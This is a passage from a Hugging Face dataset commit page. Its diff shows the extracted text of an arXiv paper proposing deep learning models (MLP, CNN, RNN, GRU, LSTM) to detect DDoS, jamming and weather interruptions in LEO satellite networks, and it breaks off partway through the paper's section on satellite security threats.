jackkuo commited on
Commit
54fa10c
·
verified ·
1 Parent(s): 798c67b

Add files using upload-large-folder tool

Browse files
This view is limited to 50 files because it contains too many changes.   See raw diff
Files changed (50) hide show
  1. -9E2T4oBgHgl3EQfmgcA/content/tmp_files/2301.03998v1.pdf.txt +2532 -0
  2. -9E2T4oBgHgl3EQfmgcA/content/tmp_files/load_file.txt +0 -0
  3. .gitattributes +1 -0
  4. 0dE2T4oBgHgl3EQf4wg0/content/tmp_files/2301.04183v1.pdf.txt +653 -0
  5. 0dE2T4oBgHgl3EQf4wg0/content/tmp_files/load_file.txt +469 -0
  6. 1NE1T4oBgHgl3EQf5AWE/content/tmp_files/2301.03507v1.pdf.txt +1396 -0
  7. 1NE1T4oBgHgl3EQf5AWE/content/tmp_files/load_file.txt +0 -0
  8. 1NFQT4oBgHgl3EQf1DYE/content/tmp_files/2301.13418v1.pdf.txt +1709 -0
  9. 1NFQT4oBgHgl3EQf1DYE/content/tmp_files/load_file.txt +0 -0
  10. 1dFPT4oBgHgl3EQfUjQc/content/tmp_files/2301.13057v1.pdf.txt +1645 -0
  11. 1dFPT4oBgHgl3EQfUjQc/content/tmp_files/load_file.txt +0 -0
  12. 39E4T4oBgHgl3EQfAwsS/content/tmp_files/2301.04845v1.pdf.txt +0 -0
  13. 39E4T4oBgHgl3EQfAwsS/content/tmp_files/load_file.txt +0 -0
  14. 59AyT4oBgHgl3EQfQfYL/content/tmp_files/2301.00044v1.pdf.txt +2257 -0
  15. 59AyT4oBgHgl3EQfQfYL/content/tmp_files/load_file.txt +0 -0
  16. 59AzT4oBgHgl3EQfvP0x/content/tmp_files/2301.01702v1.pdf.txt +1462 -0
  17. 59AzT4oBgHgl3EQfvP0x/content/tmp_files/load_file.txt +0 -0
  18. 5NE2T4oBgHgl3EQfkAfy/content/tmp_files/2301.03975v1.pdf.txt +1523 -0
  19. 5NE2T4oBgHgl3EQfkAfy/content/tmp_files/load_file.txt +0 -0
  20. 7dE2T4oBgHgl3EQf7gj3/content/tmp_files/2301.04211v1.pdf.txt +1585 -0
  21. 7dE2T4oBgHgl3EQf7gj3/content/tmp_files/load_file.txt +0 -0
  22. 99E1T4oBgHgl3EQfCgIZ/content/tmp_files/2301.02864v1.pdf.txt +2646 -0
  23. 99E1T4oBgHgl3EQfCgIZ/content/tmp_files/load_file.txt +0 -0
  24. 99FAT4oBgHgl3EQfqB0k/content/tmp_files/2301.08643v1.pdf.txt +2307 -0
  25. 99FAT4oBgHgl3EQfqB0k/content/tmp_files/load_file.txt +0 -0
  26. CNE2T4oBgHgl3EQfnwjC/content/tmp_files/2301.04012v1.pdf.txt +1756 -0
  27. CNE2T4oBgHgl3EQfnwjC/content/tmp_files/load_file.txt +0 -0
  28. CdFQT4oBgHgl3EQf_DcV/content/tmp_files/2301.13456v1.pdf.txt +0 -0
  29. CdFQT4oBgHgl3EQf_DcV/content/tmp_files/load_file.txt +0 -0
  30. HtE0T4oBgHgl3EQfhwE8/content/tmp_files/2301.02435v1.pdf.txt +801 -0
  31. HtE0T4oBgHgl3EQfhwE8/content/tmp_files/load_file.txt +155 -0
  32. HtE2T4oBgHgl3EQf_AnW/content/tmp_files/2301.04245v1.pdf.txt +2604 -0
  33. HtE2T4oBgHgl3EQf_AnW/content/tmp_files/load_file.txt +0 -0
  34. IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf +0 -0
  35. IdE5T4oBgHgl3EQfWw_6/content/tmp_files/2301.05562v1.pdf.txt +187 -0
  36. IdE5T4oBgHgl3EQfWw_6/content/tmp_files/load_file.txt +125 -0
  37. KdE4T4oBgHgl3EQf7w5t/content/tmp_files/2301.05342v1.pdf.txt +939 -0
  38. KdE4T4oBgHgl3EQf7w5t/content/tmp_files/load_file.txt +0 -0
  39. KdFRT4oBgHgl3EQf0zhG/content/tmp_files/2301.13654v1.pdf.txt +0 -0
  40. KdFRT4oBgHgl3EQf0zhG/content/tmp_files/load_file.txt +0 -0
  41. KtE2T4oBgHgl3EQfpwgn/content/tmp_files/2301.04031v1.pdf.txt +868 -0
  42. KtE2T4oBgHgl3EQfpwgn/content/tmp_files/load_file.txt +0 -0
  43. L9E3T4oBgHgl3EQfBAkx/content/tmp_files/2301.04262v1.pdf.txt +1177 -0
  44. L9E3T4oBgHgl3EQfBAkx/content/tmp_files/load_file.txt +0 -0
  45. TNFLT4oBgHgl3EQfQC8d/content/tmp_files/2301.12030v1.pdf.txt +0 -0
  46. TNFLT4oBgHgl3EQfQC8d/content/tmp_files/load_file.txt +0 -0
  47. WtFOT4oBgHgl3EQf7zTC/content/tmp_files/2301.12964v1.pdf.txt +453 -0
  48. WtFOT4oBgHgl3EQf7zTC/content/tmp_files/load_file.txt +433 -0
  49. ZNFJT4oBgHgl3EQf7S0N/content/tmp_files/2301.11677v1.pdf.txt +3531 -0
  50. ZNFJT4oBgHgl3EQf7S0N/content/tmp_files/load_file.txt +0 -0
-9E2T4oBgHgl3EQfmgcA/content/tmp_files/2301.03998v1.pdf.txt ADDED
@@ -0,0 +1,2532 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ 1
2
+ Deep learning approach for interruption attacks
3
+ detection in LEO satellite networks
4
+ Nacereddine Sitouah, Fatiha Merazka, Abdenour Hedjazi
5
+ Abstract
6
+ The developments of satellite communication in network systems require strong and effective security
7
+ plans. Attacks such as denial of service (DoS) can be detected through the use of machine learning techniques,
8
+ especially under normal operational conditions. This work aims to provide an interruption detection strategy
9
+ for Low Earth Orbit (LEO) satellite networks using deep learning algorithms. Both the training, and the testing
10
+ of the proposed models are carried out with our own communication datasets, created by utilizing a satellite
11
+ traffic (benign and malicious) that was generated using satellite networks simulation platforms, Omnet++
12
+ and
13
+ Inet.
14
+ We
15
+ test
16
+ different
17
+ deep
18
+ learning
19
+ algorithms
20
+ including
21
+ Multi
22
+ Layer
23
+ Perceptron
24
+ (MLP),
25
+ Convolutional Neural Network (CNN), Recurrent Neural Network (RNN), Gated Recurrent Units (GRU),
26
+ and Long Short-term Memory (LSTM). Followed by a full analysis and investigation of detection rate in both
27
+ binary classification, and multi-classes classification that includes different interruption categories such as
28
+ Distributed DoS (DDoS), Network Jamming, and meteorological disturbances. Simulation results for both
29
+ classification types surpassed 99.33 % in terms of detection rate in scenarios of full network surveillance.
30
+ However, in more realistic scenarios, the best-recorded performance was 96.12 % for the detection of binary
31
+ traffic and 94.35 % for the detection of multi-class traffic with a false positive rate of 3.72 %, using a hybrid
32
+ model that combines MLP and GRU. This Deep Learning approach efficiency calls for the necessity of using
33
+ machine learning methods to improve security and to give more awareness to search for solutions that facilitate
34
+ data collection in LEO satellite networks.
35
+ Index Terms
36
+ Distributed Denial of Service, Satellite Communication, Leo Earth Orbit Satellites, Deep Learning,
37
+ Intrusion Detection System, Security Development
38
+ I. Introduction
39
+ Nowadays, the internet has become more and more important in our lives; in order to satisfy
40
+ the increasing users’ demands and their needs in term of speed, latency and availability, we are
41
+ witnessing a very competitive race of network equipment revolutions, services visualization and
42
+ the emergence of the clouds. An (artificial) satellite is an object sent into space and placed in
43
+ orbit around the Earth, it is composed of many components including a power system,
44
+ N. Sitouah, F. Merazka and Abdenour Hedjazi are with the Department of Telecommunications, Electrical Engineering
45
+ Faculty,
46
+ USTHB
47
+ University,
48
+ 16111,
49
+ Algiers,
50
+ Algeria,
51
+ e-mail:
52
+ {nacereddine.sitouah@gmail.com,
53
+ fmerazka@usthb.dz,
54
+ abdouzpo@live.fr
55
+ January 11, 2023
56
+ DRAFT
57
+ arXiv:2301.03998v1 [cs.CR] 10 Dec 2022
58
+
59
+ 2
60
+ an altitude and orbit control system, and most importantly a communication system allowing
61
+ the transmission and reception of messages [1]. Satellites enable the communication between
62
+ geographically dispersed systems through wireless communication links. They are widely used in
63
+ various fields of communication, such as the Internet, radio broadcasting services, and telephony
64
+ applications.
65
+ They
66
+ allow
67
+ wider
68
+ coverage
69
+ with
70
+ reasonable
71
+ deployment
72
+ costs
73
+ compared
74
+ to terrestrial networks. Satellite communications are expected to become an independent part of
75
+ the fifth generation (5G) cellular networks and they can be the building block for the sixth
76
+ generation (6G) of wireless communication technologies. In 2020, China successfully launched an
77
+ experimental test satellite which is considered to be ”The World’s First 6G Satellite”. In
78
+ addition, satellites are making much greater use of the communication potential using Internet
79
+ of Things (IoT) equipment. In favor of satellites communication safety and reliability, just like
80
+ both wired and wireless terrestrial communication networks, the investigation of security must
81
+ be a priority, the nature of Wide Area Network (WAN) communications, especially those that
82
+ provide
83
+ wider
84
+ coverage
85
+ through
86
+ broadcasting
87
+ protocols,
88
+ makes
89
+ satellite
90
+ networks
91
+ highly
92
+ vulnerable to cyber-attacks of various types targeting large infrastructures, they typically
93
+ employ very effective, and well-supported technologies to breach their targets’ defense system.
94
+ One of most successful and invasive attacks is the denial of service (DoS) attack. A DoS attack
95
+ consists of deliberately sending a big amount of bogus messages to the operating server of the
96
+ network, aiming to disrupt and satellite communication services. This attacks exhausts the
97
+ limited resources of a satellite system components, which includes the memory, CPU, bandwidth
98
+ and also electrical energy. Another simple, yet very efficient method of causing a DoS on satellite
99
+ networks is Jamming, just as described in its name, this attack involves the use of one or
100
+ multiple devices to intentionally interfere with radio signals sent and received from and to the
101
+ satellite, compromising the communication channel with the clients or other satellites.
102
+ Because the DoS attack causes very critical security issues for wireless communication networks,
103
+ there must be efforts dedicated to prevent or at least remedy the damages caused by it. The
104
+ available computational power of this day and age, has made artificial learning and particularly
105
+ Machine Learning (ML) one of the most successful technologies for the detection, the prevention
106
+ and the prediction of security problems and incidents. We aim in this work to propose a protection
107
+ solution based on ML and demonstrate how artificial intelligence can also help ensuring the safety
108
+ and availability of non-terrestrial networks.
109
+ The rest of this paper is structured as follows. This section will also include a state of the art
110
+ regarding related works, and an overview of our contributions through this paper. In Sect. 2, an
111
+ DRAFT
112
+ January 11, 2023
113
+
114
+ 3
115
+ introduction to Low Earth Orbit (LEO) satellites security will be given with a brief description
116
+ of some of the most important interruption detection techniques currently deployed. The detailed
117
+ proposed mechanism will be presented in Sect. 3. And in Sect. 4 and 5, the environment preparation
118
+ details and the performance evaluation of our solutions will be provided. And finally, a conclusion
119
+ is given in the last section of this paper.
120
+ A. Related Work
121
+ 1) Satellite communication security: Regarding the related literature on satellite security, an
122
+ efficient and secure anonymous authentication solution for satellite communication was proposed
123
+ in [2]. It is based on a simple and secure one-way hashing function to match computation
124
+ capabilities in lightweight-device environments. Authors in [3] created an access verification
125
+ protocol (BAVP) using identity-based encryption and blockchain technologies. The combination
126
+ makes data storage more secure in distributed computing systems, particularly LEO satellite
127
+ networks. The simulation proved the security of the protocol but the deployment still needs
128
+ some reforming of the blockchain technology according to particular satellite network routing
129
+ algorithms. Another authentication schemes for satellite-communication using lightweight key
130
+ agreement was proposed in [4] [5] and [6]. Authors of [4] provided mutual authentication,
131
+ session-key agreement and a solution for user anonymity problems. They presented formal and
132
+ informal security analyses against different well-known attacks. Their results validate the new
133
+ scheme efficiency and additional security features such as user anonymity and forward secrecy.
134
+ In [7], they treat jamming threats to enhance security, the authors performed a secrecy analysis
135
+ for the uplink transmission in satellite communication which is based on the orthogonal
136
+ time-frequency space (OTFS) and a comparison with the traditional Orthogonal Frequency
137
+ Division Multiplexing (OFDM) scheme. Results demonstrated better performance of the uplink
138
+ LEO Sat-Com (Satellite Communication) system.
139
+ 2) Machine learning in satellite communication: The state of the art concerning satellite
140
+ communication security indicates that non-intelligent methods, which do not include any type of
141
+ artificial intelligence, significantly underperform compared to solutions integrating intelligence.
142
+ The work in [8] puts forward an Extreme Learning Machine-based distributed routing (ELMDR)
143
+ strategy to make routing decisions by predicting traffic. In [9], they use machine learning
144
+ algorithms
145
+ to
146
+ detect
147
+ message
148
+ collisions,
149
+ by
150
+ optimizing
151
+ the
152
+ automatic
153
+ dependent
154
+ surveillance-broadcast (ADS-B) reception. The NASA research center and authors of [10]
155
+ studied the role of machine learning in the link-to-link aspect of Sat-Com, they used
156
+ January 11, 2023
157
+ DRAFT
158
+
159
+ 4
160
+ reinforcement learning space links to ground stations using NASA’s testbed on the international
161
+ space station. In [11] authors created a lightweight model of neural networks in the hope of
162
+ encouraging the development of an intelligent edge IoT architecture by satellite, this solution
163
+ combines edge computing with deep learning. Results show and prove that lightweight neural
164
+ networks like MobileNet and ShuffleNet are more suited to satellite IoT scenarios in the IoT
165
+ edge satellite intelligent computing architecture. The work in [12] experiments on the promising
166
+ transport protocol Multipath TCP (MPTCP) in LEO Sat networks, using the self-learning
167
+ properties brought by reinforcement learning in order to find the optimal congestion control
168
+ strategies. Another potential of improvement by the use of deep learning techniques is the
169
+ accuracy of 5G terminal location discovery. [13] overcomes the dependency on the external
170
+ global navigation satellite system, data clustering methods of unsupervised ML are used to
171
+ classify and exclude measured data. [14] emulates a Sat-Com platform to generate environment
172
+ data and capture different internet communications (encrypted, unencrypted and tunneled) in
173
+ order to have a high classification rate and improve the overall Quality of Service (QoS) of the
174
+ communication. Machine learning is also recently used in satellite operation, such as interference
175
+ detection, flexible-payload configuration and congestion prediction [15], and for resource
176
+ allocation on the internet of Remote things [16], the authors study different security aspect in
177
+ SIoRTNs (satellites for Internet of Remote things networks), the proposed algorithm based on
178
+ actor-critic reinforcement learning (SACRL) showed effectiveness in term of the IoRT data
179
+ download performance.
180
+ 3) Detection of interruption using machine learning : DDoS and interruption attacks are the
181
+ biggest threat that generally target Sat-Com. We performed a comprehensive literature review
182
+ regarding these particular issues. The first obstacle was the unavailability of communications
183
+ datasets, followed by the unavailability of public DDoS traffic captured from satellite networks.
184
+ However, our work applies the same principle of using ML for DDoS detection as in-ground
185
+ networks. Experiments in [17] use public communication datasets to train a model capable of
186
+ detecting several types of attacks including the DoS in the IoT, by deploying a distributed
187
+ learning method based on Fog Computing.
188
+ Authors of [18] proposed a solution based on artificial neural networks for the recognition of
189
+ DDoS attacks, combined with a Learning Vector Quantization neural network (LVA NN). The
190
+ authors of [19] are interested in the security of the IoT, particularly the IIotT (Industrial IoT),
191
+ they developed an anomaly detection technique for the IICSs (Internet Industrial Control
192
+ Systems) based on ANNs models that can learn and validate using information collected from
193
+ DRAFT
194
+ January 11, 2023
195
+
196
+ 5
197
+ TCP/IP packets. Similarly, researchers in [20] studied the detection of DDoS attacks in smart
198
+ agriculture, called AIoT. They deploy an identifier based on three models (CNN, DNN, and
199
+ RNN) and compare its performance for both binary and multi-class classifications. Another work
200
+ in [21] developed a model based on CNNs, with both types of classification, using the most
201
+ recent IDS datasets that contains advanced DoS attacks. [22] took a different approach using a
202
+ hybrid deep learning method for Botnet attack detection in the IoT, the method overcomes
203
+ memory constraints in LSTM models, authors used a short-memory automatic encoder (LAE) to
204
+ reduce feature size, and then implemented Bi-LSTM for interruption attacks detection.
205
+ B. Contributions
206
+ In this paper, we propose a methodology that allows the study and the investigation of deep
207
+ learning solutions in the security of satellite communication. Our main contributions can be
208
+ expressed into the following:
209
+ • We present a simulation environment which allows the study on similar characteristics of
210
+ real satellite networks, using Omnet++ network simulator, and a personalized topology for
211
+ four different scenarios: Normal communication, DDoS flooding attacks, Natural cause
212
+ interruptions (ex: rain and thunderstorms) and network jamming.
213
+ • We propose a method to generate rich datasets from the simulation results, then we present
214
+ different deep learning algorithms and experiment with them on our datasets in different
215
+ scenarios and conditions.
216
+ • We test each of our algorithms on the two main datasets: SAT-COM.LEO.NDBPO#1 and
217
+ SAT-COM.LEO.NDBPO#2, for both classification types: binary classification and multi-class
218
+ classification in an offline manner.
219
+ • We finally present a methodology that allows the test of the previous algorithms combined
220
+ with probability calculations to create an IDS capable of real-time detection of interruption
221
+ causes.
222
+ • The performance of each algorithm in each scenario is investigated and compared to ensure
223
+ efficiency and minimize false alerts for better overall performance.
224
+ .
225
+ January 11, 2023
226
+ DRAFT
227
+
228
+ 6
229
+ II. LEO security
230
+ China’s CCID (China Center for Information Industry Development) estimates that the number
231
+ of LEO satellites will exceed 57,000 by 2029 [41], encompassing all technology sectors. Hence, any
232
+ damage inflicted in the satellite sector can have a quality of service effect, leading to heavy financial
233
+ or data losses. Unfortunately, organizations rarely have direct control over satellites cybersecurity,
234
+ as satellite operations are driven by technologies hosted on Earth; these land-based entry points
235
+ offers cyber attackers a huge number of potential forays. Long range telemetry for communication
236
+ with ground stations poses a great weakness, uplinks and downlinks are often transmitted via
237
+ open telecommunication network security protocols, and easily accessible by cybercriminals. IoT
238
+ devices that use satellite communications are also a potential entry points for bad actors.
239
+ A. Classification of security problems
240
+ According to the work of H. Cao et al [42], security problems in satellite communications can
241
+ be divided into three broad categories; we focus on telecommunication and network security:
242
+ • National security
243
+ 1 - Threats to national security : These threats are summed up in the theft of strategic
244
+ information on targeted countries, by deploying an Earth observation station on LEO
245
+ satellites, it’s an eavesdropping attack condemned by the Space Law.
246
+ 2 - preemption of frequency and orbit resources : The ITU organizes and shares orbit and
247
+ frequency resources according to a FIFO service queue, this type of threat consists of the
248
+ illegal use of these limited resources, which can potentially cause an interruption or a DoS.
249
+ • Network security
250
+ 3 - Identity theft: If the authentication and identification mechanism used is vulnerable, old or
251
+ public, an attacker can impersonate a legitimate terminal and gain access to it by calculating
252
+ uplink frequencies and then bypassing ACPs (Access control policies), or a spy satellite can
253
+ invoke an ISL connection that seems legitimate with the victim satellite.
254
+ 4 - Listening to data and intercepting information: Many satellite communications do not
255
+ encrypt the data transfer, and most protocols are either unscalable or hard to upgrade, which
256
+ makes listening and intercepting messages very frequent and easy to execute.
257
+ 5 - signal interference: This kind of attacks is the most common and efficient, an attacker
258
+ can interfere with satellites and scramble channels by transmitting signals from transmitters
259
+ with higher power, on the communicating frequency band.
260
+ DRAFT
261
+ January 11, 2023
262
+
263
+ 7
264
+ 6 - denial of services: Like terrestrial networks, DDoS are effective in attacking Internet
265
+ Satellites, an attacker simulates a flow of legitimate and bogus requests from satellite terminals
266
+ in order to send it to satellites, preventing legitimate terminals from good service quality.
267
+ 7 - Malicious occupation of satellite bandwidth resources: Most satellites operate as a
268
+ transponder without unpacking the signal, so it becomes impossible to verify the legitimacy
269
+ of a received signal, even if the satellite manages to unwrap the signal, the attacker uses his
270
+ own cryptography technique to hide his communications.
271
+ • Equipment safety
272
+ 8 - Malicious satellite control: An attacker sends malicious instructions or injects viruses into
273
+ satellites from the ground or from space to achieve the objective of controlling the satellites,
274
+ dragging the satellite out of orbit, interrupting services or contaminating other satellites.
275
+ 9 - Malicious consumption of satellite resources: An attacker directly affect the lifespan of
276
+ satellites by consuming thrusters (responsible for satellite movement, maintaining orbit and
277
+ avoiding collisions).
278
+ B. Interruptions detection techniques
279
+ An interruption is a temporary shutdown or a temporary unavailability of a satellite network
280
+ supply to a customer, such as signal interference, denials of service, unauthorized use of resources,
281
+ malicious network jamming. The protection against such attacks can be classified into four methods
282
+ according to [41]:
283
+ • Statistical-based methods: Based on various statistical algorithms developed using different
284
+ measures. Detection begins with data collection, and ends with an analysis of a significant
285
+ sample of the network to identify malicious traffic.
286
+ In [43], a detection based on the entropy anomaly is proposed, it can determine whether the
287
+ current state is normal or compromised based on the entropy value, then detects the DDoS
288
+ attack by changing the entropy value of the network characteristics. Moreover, Shannon’s entropy
289
+ [6] is considered to be one of the best methods to detect abnormal traffic [44] [45].
290
+ • Machine learning method: Traditional ML approaches are used to analyze and classify traffic. They
291
+ obtain good results under certain conditions. In [46], a method based on K-means and K-nearest
292
+ fast neighbors is proposed. The limitation of traditional machine learning for detecting DDoS
293
+ attacks is that historical traffic characteristics cannot be used, and the bigger the data grows, the
294
+ lower the detection rate. It is for this reason that new ML approaches such as DL give more hope
295
+ for better results.
296
+ January 11, 2023
297
+ DRAFT
298
+
299
+ 8
300
+ • Prevention techniques: One of these works is presented in [47] in which the authors studied the
301
